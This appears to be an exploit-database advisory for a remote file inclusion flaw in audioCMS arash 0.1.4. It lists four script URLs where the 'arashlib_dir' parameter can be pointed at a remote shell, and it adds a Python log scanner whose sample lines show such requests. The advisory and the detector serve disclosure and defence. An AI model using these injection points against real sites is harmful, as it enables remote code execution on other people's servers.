Vendor: audioCMS arash
By: GolD_M = [Mahmood_ali]
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: audioCMS arash
Affected Version From: 2000.1.4
Affected Version To: 2000.1.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

audioCMS arash 0.1.4 (arashlib_dir) Remote File Inclusion Vulnerabilities

audioCMS arash 0.1.4 is vulnerable to remote file inclusion. An attacker can include remote files by manipulating the 'arashlib_dir' parameter in various scripts, which can lead to arbitrary code execution and compromise of the affected system.

Mitigation:

To mitigate this vulnerability, update to a patched version of audioCMS arash or apply any available security patches. Additionally, implement input validation and sanitization to prevent remote file inclusion attacks.

Exploit-DB raw data:

# audioCMS arash 0.1.4(arashlib_dir)Remote File Inclusion Vulnerabilities
# D.Script: http://sourceforge.net/projects/arash/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://Www.Tryag.Com/cc
# Exploit:[Path]/arash_lib/include/edit.inc.php?arashlib_dir=Shell
# Exploit:[Path]/arash_lib/include/list_features.inc.php?arashlib_dir=Shell
# Exploit:[Path]/arash_lib/class/arash_gadmin.class.php?arashlib_dir=Shell
# Exploit:[Path]/arash_lib/class/arash_sadmin.class.php?arashlib_dir=Shell
# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb

# milw0rm.com [2007-04-15]
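
A detection check to accompany the mitigation advice, added here as an example and not part of the original advisory or the audioCMS arash code: it scans web access-log lines for requests that pass arashlib_dir to the four scripts listed above and separates values carrying a URL scheme from other values. The combined log format, the sample lines and the names classify and scan are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script paths named in the advisory as accepting arashlib_dir.
AFFECTED = (
    "/arash_lib/include/edit.inc.php",
    "/arash_lib/include/list_features.inc.php",
    "/arash_lib/class/arash_gadmin.class.php",
    "/arash_lib/class/arash_sadmin.class.php",
)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme / stream wrapper, or with //host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]+:|//)", re.I)

def classify(line):
    """Return None, 'param-present' or 'remote-value' for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    # Lower-case the decoded path so case-insensitive file systems are covered.
    if not unquote(target.path).lower().endswith(AFFECTED):
        return None
    # parse_qsl percent-decodes names and values once (arashlib%5Fdir matches).
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name == "arashlib_dir":
            # Decode once more so a double-encoded value is still recognised.
            return "remote-value" if REMOTE.match(unquote(value)) else "param-present"
    return None

def scan(lines):
    """Return (line_number, verdict) for every line that needs review."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]

# Constructed sample lines (documentation addresses, example.test host).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Apr/2007:10:00:00 +0000] "GET /cms/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [15/Apr/2007:10:00:07 +0000] "GET /cms/arash_lib/include/'
    'edit.inc.php?arashlib_dir=http://example.test/x.txt? HTTP/1.1" 200 312',
    '192.0.2.44 - - [15/Apr/2007:10:00:09 +0000] "GET /cms/arash_lib/class/arash_sadmin'
    '.class.php?arashlib%5Fdir=http%3A%2F%2Fexample.test%2F HTTP/1.0" 200 0',
    '192.0.2.51 - - [15/Apr/2007:10:01:00 +0000] "GET /cms/arash_lib/include/'
    'list_features.inc.php?arashlib_dir=lib HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(f"line {lineno}: {verdict}")
```

Only the request line is inspected, so a value sent in a POST body or cookie does not appear in these logs and needs application-level logging to be seen.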